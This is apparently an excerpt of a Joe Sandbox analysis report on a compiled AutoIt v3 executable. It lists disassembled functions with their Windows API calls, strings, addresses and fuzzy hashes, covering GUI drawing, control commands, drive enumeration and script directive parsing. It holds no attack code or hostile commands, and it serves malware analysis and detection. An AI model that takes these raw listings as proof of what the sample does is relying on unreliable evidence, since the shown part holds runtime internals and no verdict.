SETCURRENTSELECTION, xrefs: 00D83A3E
FINDSTRING, xrefs: 00D839FE
ADDSTRING, xrefs: 00D8399E
EDITPASTE, xrefs: 00D83BE7
GETCURRENTSELECTION, xrefs: 00D83A6B
GETLINECOUNT, xrefs: 00D83B4E
UNCHECK, xrefs: 00D83B0B
GETSELECTED, xrefs: 00D83B2B
GETLINE, xrefs: 00D83C23
CHECK, xrefs: 00D83AF5
ISCHECKED, xrefs: 00D83AC1
HIDEDROPDOWN, xrefs: 00D83988
ISVISIBLE, xrefs: 00D838BF

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 3a01ae4fa8ec92d6b8f27f1233037050b14d0a881ff8dc9a56b8b5e559f84acd
Instruction ID: 24649892418525baf5b7cdeb28995902a8dd641424851b567d565f774aa74f04
Opcode Fuzzy Hash: 3a01ae4fa8ec92d6b8f27f1233037050b14d0a881ff8dc9a56b8b5e559f84acd
Instruction Fuzzy Hash: EDD15A30204215DFCB14FF24C451AAABBA5EF94754F144859BC8A5B3A3DB71EE0ACB71

Function 00D8A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00D8A89F
GetSysColorBrush.USER32(0000000F), ref: 00D8A8D0
GetSysColor.USER32(0000000F), ref: 00D8A8DC
SetBkColor.GDI32(?,000000FF), ref: 00D8A8F6
SelectObject.GDI32(?,?), ref: 00D8A905
InflateRect.USER32(?,000000FF,000000FF), ref: 00D8A930
GetSysColor.USER32(00000010), ref: 00D8A938
CreateSolidBrush.GDI32(00000000), ref: 00D8A93F
FrameRect.USER32(?,?,00000000), ref: 00D8A94E
DeleteObject.GDI32(00000000), ref: 00D8A955
InflateRect.USER32(?,000000FE,000000FE), ref: 00D8A9A0
FillRect.USER32(?,?,?), ref: 00D8A9D2
GetWindowLongW.USER32(?,000000F0), ref: 00D8A9FD

Part of subcall function 00D8AB60: GetSysColor.USER32(00000012), ref: 00D8AB99
Part of subcall function 00D8AB60: SetTextColor.GDI32(?,?), ref: 00D8AB9D
Part of subcall function 00D8AB60: GetSysColorBrush.USER32(0000000F), ref: 00D8ABB3
Part of subcall function 00D8AB60: GetSysColor.USER32(0000000F), ref: 00D8ABBE
Part of subcall function 00D8AB60: GetSysColor.USER32(00000011), ref: 00D8ABDB
Part of subcall function 00D8AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D8ABE9
Part of subcall function 00D8AB60: SelectObject.GDI32(?,00000000), ref: 00D8ABFA
Part of subcall function 00D8AB60: SetBkColor.GDI32(?,00000000), ref: 00D8AC03
Part of subcall function 00D8AB60: SelectObject.GDI32(?,?), ref: 00D8AC10
Part of subcall function 00D8AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00D8AC2F
Part of subcall function 00D8AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D8AC46
Part of subcall function 00D8AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00D8AC5B

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 8c432281ba06625ddbdd658868c798d3e26d44185ec7b7797cefd4f37586e127
Instruction ID: 63f5b6fd1ee16668914d5d61661b2916b436bdd5e8d6a04f772c2a47bd29f12c
Opcode Fuzzy Hash: 8c432281ba06625ddbdd658868c798d3e26d44185ec7b7797cefd4f37586e127
Instruction Fuzzy Hash: 17A18F72018301BFD710AF68DC08E5B7BA9FF89721F144A2AF962D62E0D774D945CB62

Function 00D02C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00D02CA2
DeleteObject.GDI32(00000000), ref: 00D02CE8
DeleteObject.GDI32(00000000), ref: 00D02CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00D02CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00D02D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00D3C68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D3C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D3CAED

Part of subcall function 00D01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D02036,?,00000000,?,?,?,?,00D016CB,00000000,?), ref: 00D01B9A

SendMessageW.USER32(?,00001053), ref: 00D3CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D3CB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D3CB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D3CB62

Strings

0, xrefs: 00D3C981

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 61dd32dee53eac0f4e8dc816992a36e4c76997f1945e8568621b67be335af047
Instruction ID: 37c0a46168c541aed3ba59a07b20924dac42d8ce7ef7220263ee16f2e3106b46
Opcode Fuzzy Hash: 61dd32dee53eac0f4e8dc816992a36e4c76997f1945e8568621b67be335af047
Instruction Fuzzy Hash: E2129C30611201EFDB20CF24C889BA9B7E5FF05315F585569E889EB2A2C731EC51CBB1

Function 00D777BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00D777F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D778B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00D778EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00D77900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00D77946
GetClientRect.USER32(00000000,?), ref: 00D77952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00D77996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00D779A5
GetStockObject.GDI32(00000011), ref: 00D779B5
SelectObject.GDI32(00000000,00000000), ref: 00D779B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00D779C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D779D2
DeleteDC.GDI32(00000000), ref: 00D779DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00D77A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00D77A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00D77A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00D77A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00D77A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00D77AAE
GetStockObject.GDI32(00000011), ref: 00D77AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00D77AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00D77ACE

Strings

AutoIt v3, xrefs: 00D7793E
DISPLAY, xrefs: 00D7799B
msctls_progress32, xrefs: 00D77A4F
static, xrefs: 00D77990, 00D77AA8

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: b681f2e2433566eee461dfbf9021140dfc823961af90e1c461f2b49f0d42bd8d
Instruction ID: 9447d4dfa36f99ebe8afab1be06356b78f995d2f5303d53b85a9142d7904abdc
Opcode Fuzzy Hash: b681f2e2433566eee461dfbf9021140dfc823961af90e1c461f2b49f0d42bd8d
Instruction Fuzzy Hash: CFA16071A50215BFEB149BA4DC4AFAEBBB9EB48710F108514FA15E72E0D770AD01CB74

Function 00D6AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00D6AF89
GetDriveTypeW.KERNEL32(?,00D8FAC0,?,\\.\,00D8F910), ref: 00D6B066
SetErrorMode.KERNEL32(00000000,00D8FAC0,?,\\.\,00D8F910), ref: 00D6B1C4

Strings

ATAPI, xrefs: 00D6B138
SSD, xrefs: 00D6B0F1
FileBackedVirtual, xrefs: 00D6B193
SAS, xrefs: 00D6B170
Fibre, xrefs: 00D6B154
SSA, xrefs: 00D6B14D
\\.\, xrefs: 00D6AFDB
USB, xrefs: 00D6B15B
Fixed, xrefs: 00D6B0AE
Removable, xrefs: 00D6B0B8
RAMDisk, xrefs: 00D6B090
SATA, xrefs: 00D6B177
Unknown, xrefs: 00D6B086, 00D6B12A
ATA, xrefs: 00D6B13F
Network, xrefs: 00D6B0A4
MMC, xrefs: 00D6B185
RAID, xrefs: 00D6B162
PhysicalDrive, xrefs: 00D6B012
CDROM, xrefs: 00D6B09A
SCSI, xrefs: 00D6B131
1394, xrefs: 00D6B146
iSCSI, xrefs: 00D6B169
Virtual, xrefs: 00D6B18C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 7c7656598cca1f84c147bd5cfe2363cdb5bbd1af19df522a4388d08af26f97e6
Instruction ID: 164406793da9514100db0f27661338ff86f1f5c216e6befe743a6bb37124fb38
Opcode Fuzzy Hash: 7c7656598cca1f84c147bd5cfe2363cdb5bbd1af19df522a4388d08af26f97e6
Instruction Fuzzy Hash: 4F519030684305FFCB10EF18C9A29BD77B0EB263617244017E44BEB291DB69ED859B72

Function 00D06A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00D06A91
__wcsnicmp.LIBCMT ref: 00D06AA9
__wcsnicmp.LIBCMT ref: 00D06AC1
__wcsnicmp.LIBCMT ref: 00D06AD9
__wcsnicmp.LIBCMT ref: 00D06AF1
__wcsnicmp.LIBCMT ref: 00D06B09
__wcsnicmp.LIBCMT ref: 00D06B21
__wcsnicmp.LIBCMT ref: 00D06B35
__wcsnicmp.LIBCMT ref: 00D06B76
__wcsnicmp.LIBCMT ref: 00D06B8A
__wcsnicmp.LIBCMT ref: 00D06B9E
__wcsnicmp.LIBCMT ref: 00D06BB2

Strings

#ce, xrefs: 00D06BAC
#include, xrefs: 00D06B03
#include-once, xrefs: 00D06AEB
Unterminated group of comments, xrefs: 00D3E82C
#requireadmin, xrefs: 00D06ABB
#pragma compile, xrefs: 00D06A8B
#comments-end, xrefs: 00D06B98
Cannot parse #include, xrefs: 00D3E819
#OnAutoItStartRegister, xrefs: 00D06AD3
#cs, xrefs: 00D06B2F, 00D06B84
#notrayicon, xrefs: 00D06AA3
#comments-start, xrefs: 00D06B1B, 00D06B70
Bad directive syntax error, xrefs: 00D3E743

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 0e2fc48aca9bed345ce48a439fe2ee76dcd5e669b584f65d04147a2f0a657f50
Instruction ID: b3f073d46f85da89b88b60445d145997fe19ae6b4e0c5644574b875f18bf86e1
Opcode Fuzzy Hash: 0e2fc48aca9bed345ce48a439fe2ee76dcd5e669b584f65d04147a2f0a657f50
Instruction Fuzzy Hash: A381D8B1740355BACB20BB64DD82FBF7768EF24704F084025FD49AA1C2EB64EA55C6B1

Function 00D8AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00D8AB99
SetTextColor.GDI32(?,?), ref: 00D8AB9D
GetSysColorBrush.USER32(0000000F), ref: 00D8ABB3
GetSysColor.USER32(0000000F), ref: 00D8ABBE
CreateSolidBrush.GDI32(?), ref: 00D8ABC3
GetSysColor.USER32(00000011), ref: 00D8ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D8ABE9
SelectObject.GDI32(?,00000000), ref: 00D8ABFA
SetBkColor.GDI32(?,00000000), ref: 00D8AC03
SelectObject.GDI32(?,?), ref: 00D8AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 00D8AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D8AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 00D8AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00D8ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00D8ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 00D8ACEC
DrawFocusRect.USER32(?,?), ref: 00D8ACF7
GetSysColor.USER32(00000011), ref: 00D8AD05
SetTextColor.GDI32(?,00000000), ref: 00D8AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00D8AD21
SelectObject.GDI32(?,00D8A869), ref: 00D8AD38
DeleteObject.GDI32(?), ref: 00D8AD43
SelectObject.GDI32(?,?), ref: 00D8AD49
DeleteObject.GDI32(?), ref: 00D8AD4E
SetTextColor.GDI32(?,?), ref: 00D8AD54
SetBkColor.GDI32(?,?), ref: 00D8AD5E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: e581463c9c2ef6a27260b433f1857db691e57f39abf03b9263217b20e897840c
Instruction ID: ac5eabaec973ccac43be0c972cf1a57f7dea26150b436e5e5923583c5735bdab
Opcode Fuzzy Hash: e581463c9c2ef6a27260b433f1857db691e57f39abf03b9263217b20e897840c
Instruction Fuzzy Hash: 68615E71910218EFEF119FA8DC48EAE7B79EB08720F244126F915EB2A1D7759D40DBA0

Function 00D88C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00D88D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D88D45
CharNextW.USER32(0000014E), ref: 00D88D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00D88DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00D88DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D88DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00D88DF9
SetWindowTextW.USER32(?,0000014E), ref: 00D88E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00D88E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00D88E8C
_memset.LIBCMT ref: 00D88EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00D88EFA
_memset.LIBCMT ref: 00D88F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D88F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00D88FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00D89088
InvalidateRect.USER32(?,00000000,00000001), ref: 00D890AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D890F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D89121
DrawMenuBar.USER32(?), ref: 00D89130
SetWindowTextW.USER32(?,0000014E), ref: 00D89158

Strings

0, xrefs: 00D890C2

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 84cd00e28d810ab03a587037102292f5b3087eb687c24ce6b73f48c446fc23eb
Instruction ID: 5ddc6c87858c843d6ac3a399bcc030817aa6d3af0eb2a4ddeee15df906abbf00
Opcode Fuzzy Hash: 84cd00e28d810ab03a587037102292f5b3087eb687c24ce6b73f48c446fc23eb
Instruction Fuzzy Hash: AAE18070900219AFDF20AF55CC88EFEBBB9EF15710F548159F955AA290DB708A81DF70

Function 00D84B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00D84C51
GetDesktopWindow.USER32 ref: 00D84C66
GetWindowRect.USER32(00000000), ref: 00D84C6D
GetWindowLongW.USER32(?,000000F0), ref: 00D84CCF
DestroyWindow.USER32(?), ref: 00D84CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00D84D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D84D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00D84D68
SendMessageW.USER32(?,00000421,?,?), ref: 00D84D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00D84D90
IsWindowVisible.USER32(?), ref: 00D84DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00D84DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00D84DDF
GetWindowRect.USER32(?,?), ref: 00D84DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00D84E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00D84E37
CopyRect.USER32(?,?), ref: 00D84E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00D84EB9

Strings

(, xrefs: 00D84E2A
0, xrefs: 00D84BFC
tooltips_class32, xrefs: 00D84D1D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 3c572a274d13054b4cbc41f07f1f30496c9cd43526dfedfbc69c604991e818cf
Instruction ID: 2833d8e4f25d96a936d87e2fbbfdf05d71083fa1b036f33599758830cfeea73d
Opcode Fuzzy Hash: 3c572a274d13054b4cbc41f07f1f30496c9cd43526dfedfbc69c604991e818cf
Instruction Fuzzy Hash: 3FB17B71614341AFDB04EF64C849B6ABBE4FF88310F048A1DF5999B2A2D771EC04CBA5

Function 00D027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D028BC
GetSystemMetrics.USER32(00000007), ref: 00D028C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D028EF
GetSystemMetrics.USER32(00000008), ref: 00D028F7
GetSystemMetrics.USER32(00000004), ref: 00D0291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D02939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D02949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D0297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D02990
GetClientRect.USER32(00000000,000000FF), ref: 00D029AE
GetStockObject.GDI32(00000011), ref: 00D029CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00D029D5

Part of subcall function 00D02344: GetCursorPos.USER32(?), ref: 00D02357
Part of subcall function 00D02344: ScreenToClient.USER32(00DC67B0,?), ref: 00D02374
Part of subcall function 00D02344: GetAsyncKeyState.USER32(00000001), ref: 00D02399
Part of subcall function 00D02344: GetAsyncKeyState.USER32(00000002), ref: 00D023A7

SetTimer.USER32(00000000,00000000,00000028,00D01256), ref: 00D029FC

Strings

AutoIt v3 GUI, xrefs: 00D02974

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: a7e5078b89a7101d9546dedf2b79ca112bf66de6b39812bfd677562492d12289
Instruction ID: 4d24c27946671fb9873936a0710651ae9677bdcc9bd27bce664b2a3d96aa44f1
Opcode Fuzzy Hash: a7e5078b89a7101d9546dedf2b79ca112bf66de6b39812bfd677562492d12289
Instruction Fuzzy Hash: 7EB13B7561120AAFDB14DF68DC49BAE7BA4FB08314F108529FA15E72D0DB74E850CB70

Function 00D84069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00D840F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00D841B6

Strings

SELECT, xrefs: 00D84250
GETTEXT, xrefs: 00D8415F
VIEWCHANGE, xrefs: 00D84375
SELECTINVERT, xrefs: 00D84286
GETITEMCOUNT, xrefs: 00D84128
ISSELECTED, xrefs: 00D841C1
SELECTCLEAR, xrefs: 00D84235
DESELECT, xrefs: 00D842A4
SELECTALL, xrefs: 00D8421D
GETSELECTEDCOUNT, xrefs: 00D84199
FINDITEM, xrefs: 00D84329
GETSUBITEMCOUNT, xrefs: 00D84141
GETSELECTED, xrefs: 00D842E4

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
